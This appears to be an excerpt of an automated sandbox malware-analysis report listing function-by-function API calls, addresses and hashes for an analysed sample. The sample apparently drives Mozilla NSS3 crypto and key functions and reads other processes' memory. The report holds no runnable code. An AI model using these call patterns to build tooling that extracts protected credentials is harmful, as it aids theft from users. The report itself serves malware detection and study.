                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF05830508608EFE364EFE0EF0976CBBB1EB8E703F001195E60A86290CA744A119B65
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000,6C351444,?,00000001,?,00000000,00000000,?,?,6C351444,?,?,00000000,?,?), ref: 6C350CB3
                                                                                                                                                                                                                                                • Part of subcall function 6C3BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C3BC2BF
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C351444,?,00000001,?,00000000,00000000,?,?,6C351444,?), ref: 6C350DC1
                                                                                                                                                                                                                                              • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C351444,?,00000001,?,00000000,00000000,?,?,6C351444,?), ref: 6C350DEC
                                                                                                                                                                                                                                                • Part of subcall function 6C370F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C312AF5,?,?,?,?,?,6C310A1B,00000000), ref: 6C370F1A
                                                                                                                                                                                                                                                • Part of subcall function 6C370F10: malloc.MOZGLUE(00000001), ref: 6C370F30
                                                                                                                                                                                                                                                • Part of subcall function 6C370F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C370F42
                                                                                                                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C351444,?,00000001,?,00000000,00000000,?), ref: 6C350DFF
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C351444,?,00000001,?,00000000), ref: 6C350E16
                                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C351444,?,00000001,?,00000000,00000000,?), ref: 6C350E53
                                                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,6C351444,?,00000001,?,00000000,00000000,?,?,6C351444,?,?,00000000), ref: 6C350E65
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C351444,?,00000001,?,00000000,00000000,?), ref: 6C350E79
                                                                                                                                                                                                                                                • Part of subcall function 6C361560: TlsGetValue.KERNEL32(00000000,?,6C330844,?), ref: 6C36157A
                                                                                                                                                                                                                                                • Part of subcall function 6C361560: EnterCriticalSection.KERNEL32(?,?,?,6C330844,?), ref: 6C36158F
                                                                                                                                                                                                                                                • Part of subcall function 6C361560: PR_Unlock.NSS3(?,?,?,?,6C330844,?), ref: 6C3615B2
                                                                                                                                                                                                                                                • Part of subcall function 6C32B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C331397,00000000,?,6C32CF93,5B5F5EC0,00000000,?,6C331397,?), ref: 6C32B1CB
                                                                                                                                                                                                                                                • Part of subcall function 6C32B1A0: free.MOZGLUE(5B5F5EC0,?,6C32CF93,5B5F5EC0,00000000,?,6C331397,?), ref: 6C32B1D2
                                                                                                                                                                                                                                                • Part of subcall function 6C3289E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C3288AE,-00000008), ref: 6C328A04
                                                                                                                                                                                                                                                • Part of subcall function 6C3289E0: EnterCriticalSection.KERNEL32(?), ref: 6C328A15
                                                                                                                                                                                                                                                • Part of subcall function 6C3289E0: memset.VCRUNTIME140(6C3288AE,00000000,00000132), ref: 6C328A27
                                                                                                                                                                                                                                                • Part of subcall function 6C3289E0: PR_Unlock.NSS3(?), ref: 6C328A35
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1601681851-0
                                                                                                                                                                                                                                              • Opcode ID: 4ffa7bb9dcd208fff7f306bc8b8f2047ba1b3b0dd484995ec7061a5d8b0fd97a
                                                                                                                                                                                                                                              • Instruction ID: e2fefaa235234348e3a95a26204fe35bdefc2266342eb79545534eedf8327b62
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ffa7bb9dcd208fff7f306bc8b8f2047ba1b3b0dd484995ec7061a5d8b0fd97a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E5198B6E002505FEB109F64DC81EAB37A8AF4525CF550424EC499BB12E736ED258EE3
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(6C362D7C,6C339192,?), ref: 6C36248E
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02B80138), ref: 6C3624A2
                                                                                                                                                                                                                                              • memset.VCRUNTIME140(6C362D7C,00000020,6C362D5C), ref: 6C36250E
                                                                                                                                                                                                                                              • memset.VCRUNTIME140(6C362D9C,00000020,6C362D7C), ref: 6C362535
                                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000020,?), ref: 6C36255C
                                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000020,?), ref: 6C362583
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C362594
                                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C3625AF
                                                                                                                                                                                                                                                • Part of subcall function 6C3BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C3BC2BF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset$Value$CriticalEnterErrorSectionUnlock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2972906980-0
                                                                                                                                                                                                                                              • Opcode ID: 45b8110553f2e8153564c73ce191cc3c56a27534342e03abf1cfa86af50501ba
                                                                                                                                                                                                                                              • Instruction ID: 4b773c3384527de54969e5182d7792369e18f27ee3cb1aa1ccb755cbeb7c58db
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45b8110553f2e8153564c73ce191cc3c56a27534342e03abf1cfa86af50501ba
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D74163B0E003019BEB10EF31CD98BA97774BB88308F150628ED00D7A5AF772A9C4CA91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • strlen.MSVCRT ref: 00413BDF
                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00413C0D
                                                                                                                                                                                                                                                • Part of subcall function 00413890: strlen.MSVCRT ref: 004138A1
                                                                                                                                                                                                                                                • Part of subcall function 00413890: strlen.MSVCRT ref: 004138C5
                                                                                                                                                                                                                                              • VirtualQueryEx.KERNEL32(00413FCD,00000000,?,0000001C), ref: 00413C52
                                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 00413D73
                                                                                                                                                                                                                                                • Part of subcall function 00413AA0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00413AB8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                                                                                                                                                                              • String ID: @$Z>A
                                                                                                                                                                                                                                              • API String ID: 2950663791-2427737632
                                                                                                                                                                                                                                              • Opcode ID: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
                                                                                                                                                                                                                                              • Instruction ID: 18b3d1c53e1ab9283c7d4f20bb5e0d2682d9205760932c7229ac25ba092b9e39
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2851F9B5D00109ABDB04CF98E981AEFB7B5FF88305F108119F919A7340D738AA51CBA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C35AB3E,?,?,?), ref: 6C35AC35
                                                                                                                                                                                                                                                • Part of subcall function 6C33CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C33CF16
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C35AB3E,?,?,?), ref: 6C35AC55
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C3710F3
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: EnterCriticalSection.KERNEL32(?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37110C
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: PL_ArenaAllocate.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371141
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: PR_Unlock.NSS3(?,?,?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C371182
                                                                                                                                                                                                                                                • Part of subcall function 6C3710C0: TlsGetValue.KERNEL32(?,6C318802,00000000,00000008,?,6C30EF74,00000000), ref: 6C37119C
                                                                                                                                                                                                                                              • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C35AB3E,?,?), ref: 6C35AC70
                                                                                                                                                                                                                                                • Part of subcall function 6C33E300: TlsGetValue.KERNEL32 ref: 6C33E33C
                                                                                                                                                                                                                                                • Part of subcall function 6C33E300: EnterCriticalSection.KERNEL32(?), ref: 6C33E350
                                                                                                                                                                                                                                                • Part of subcall function 6C33E300: PR_Unlock.NSS3(?), ref: 6C33E5BC
                                                                                                                                                                                                                                                • Part of subcall function 6C33E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C33E5CA
                                                                                                                                                                                                                                                • Part of subcall function 6C33E300: TlsGetValue.KERNEL32 ref: 6C33E5F2
                                                                                                                                                                                                                                                • Part of subcall function 6C33E300: EnterCriticalSection.KERNEL32(?), ref: 6C33E606
                                                                                                                                                                                                                                                • Part of subcall function 6C33E300: PORT_Alloc_Util.NSS3(?), ref: 6C33E613
                                                                                                                                                                                                                                              • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C35AC92
                                                                                                                                                                                                                                              • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C35AB3E), ref: 6C35ACD7
                                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6C35AD10
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C35AD2B
                                                                                                                                                                                                                                                • Part of subcall function 6C33F360: TlsGetValue.KERNEL32(00000000,?,6C35A904,?), ref: 6C33F38B
                                                                                                                                                                                                                                                • Part of subcall function 6C33F360: EnterCriticalSection.KERNEL32(?,?,?,6C35A904,?), ref: 6C33F3A0
                                                                                                                                                                                                                                                • Part of subcall function 6C33F360: PR_Unlock.NSS3(?,?,?,?,6C35A904,?), ref: 6C33F3D3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2926855110-0
                                                                                                                                                                                                                                              • Opcode ID: feb1708da4588188c0cc0e6a1fd8f389367f62bea95594c872d98728f57964bb
                                                                                                                                                                                                                                              • Instruction ID: 0b88d5e027b05d26da36c8515b1e81033f34cfcb576c6dfe88d97e6a03e44503
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: feb1708da4588188c0cc0e6a1fd8f389367f62bea95594c872d98728f57964bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC3138B1E002155FEB00AE259C40DFF76A6AF84728B598128E8599B740EB31DD259BB1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_Now.NSS3 ref: 6C338C7C
                                                                                                                                                                                                                                                • Part of subcall function 6C3D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C420A27), ref: 6C3D9DC6
                                                                                                                                                                                                                                                • Part of subcall function 6C3D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C420A27), ref: 6C3D9DD1
                                                                                                                                                                                                                                                • Part of subcall function 6C3D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3D9DED
                                                                                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C338CB0
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C338CD1
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C338CE5
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C338D2E
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C338D62
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C338D93
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3131193014-0
                                                                                                                                                                                                                                              • Opcode ID: 7143437aad2a0b5b23f32d11dea499cc35429a875828d0c6385bfbf001dd95d9
                                                                                                                                                                                                                                              • Instruction ID: ee1fae787e2873130a085f4a5b77798f4e4b59f6ea24b06ecaf6823f9338391c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7143437aad2a0b5b23f32d11dea499cc35429a875828d0c6385bfbf001dd95d9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3315771A01221ABEB01AF68DC44BAAB774BF54318F10113BEA1DA7B50D731A914CFD2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(00000000,?,6C327296,00000000), ref: 6C364487
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,6C327296,00000000), ref: 6C3644A0
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,6C327296,00000000), ref: 6C3644BB
                                                                                                                                                                                                                                              • SECMOD_DestroyModule.NSS3(?,?,?,?,6C327296,00000000), ref: 6C3644DA
                                                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,6C327296,00000000), ref: 6C364530
                                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,6C327296,00000000), ref: 6C36453C
                                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3 ref: 6C36454F
                                                                                                                                                                                                                                                • Part of subcall function 6C34CAA0: PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD,6C32B1EE,D958E836,?,6C3651C5), ref: 6C34CAFA
                                                                                                                                                                                                                                                • Part of subcall function 6C34CAA0: PR_UnloadLibrary.NSS3(?,6C3651C5), ref: 6C34CB09
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSection$Arena_DeleteDestroyEnterFreeLibraryModuleSecureUnloadUnlockUtilValuefree
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3590924995-0
                                                                                                                                                                                                                                              • Opcode ID: 076a737bb7eef6eb5304447fb6e20d27ca1a508366be190c37b9714492d9db93
                                                                                                                                                                                                                                              • Instruction ID: 48a13082457516c1a124f1e760ce4c21c90f1b509f539a883dbb0bece4608ec7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 076a737bb7eef6eb5304447fb6e20d27ca1a508366be190c37b9714492d9db93
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D3115B4A046118FDB10EF7AC094669BBF0BF05318F014629D99997E04E735E898CF92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C328C1B
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 6C328C34
                                                                                                                                                                                                                                              • PL_ArenaAllocate.NSS3 ref: 6C328C65
                                                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6C328C9C
                                                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6C328CB6
                                                                                                                                                                                                                                                • Part of subcall function 6C3BDD70: TlsGetValue.KERNEL32 ref: 6C3BDD8C
                                                                                                                                                                                                                                                • Part of subcall function 6C3BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C3BDDB4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                                              • String ID: KRAM
                                                                                                                                                                                                                                              • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                                              • Opcode ID: c10170f75fdbec73a8966f629e174cabb117f10e4a80f609eabdb0a65cdefc19
                                                                                                                                                                                                                                              • Instruction ID: 6fd754eecaaf06538f01884dad57f82cf5a3d27b2fc2af7ef4e979545981f19a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c10170f75fdbec73a8966f629e174cabb117f10e4a80f609eabdb0a65cdefc19
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB212EB26056118FDB00AF79C484569FBF4FF45708F05896ED8888B751DB39D885CF92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PR_EnterMonitor.NSS3 ref: 6C422CA0
                                                                                                                                                                                                                                              • PR_ExitMonitor.NSS3 ref: 6C422CBE
                                                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,00000014), ref: 6C422CD1
                                                                                                                                                                                                                                              • strdup.MOZGLUE(?), ref: 6C422CE1
                                                                                                                                                                                                                                              • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C422D27
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Loaded library %s (static lib), xrefs: 6C422D22
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                                                              • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                                                              • API String ID: 3511436785-2186981405
                                                                                                                                                                                                                                              • Opcode ID: 41e4fc3650daff729724fc5dc43cd226cc63fab7d3d8dcf3b4542c46919e335b
                                                                                                                                                                                                                                              • Instruction ID: d98a77e993b7a81d08c8b5bac8d791032d377e262c6e08c695760465b5462db4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41e4fc3650daff729724fc5dc43cd226cc63fab7d3d8dcf3b4542c46919e335b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 261122B17102509FEB21EF16D84AE6677B4AB45329F14803DD80AC7B01DB39E808CFB2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C37ED6B
                                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000), ref: 6C37EDCE
                                                                                                                                                                                                                                                • Part of subcall function 6C370BE0: malloc.MOZGLUE(6C368D2D,?,00000000,?), ref: 6C370BF8
                                                                                                                                                                                                                                                • Part of subcall function 6C370BE0: TlsGetValue.KERNEL32(6C368D2D,?,00000000,?), ref: 6C370C15
                                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?,6C37B04F), ref: 6C37EE46
                                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C37EECA
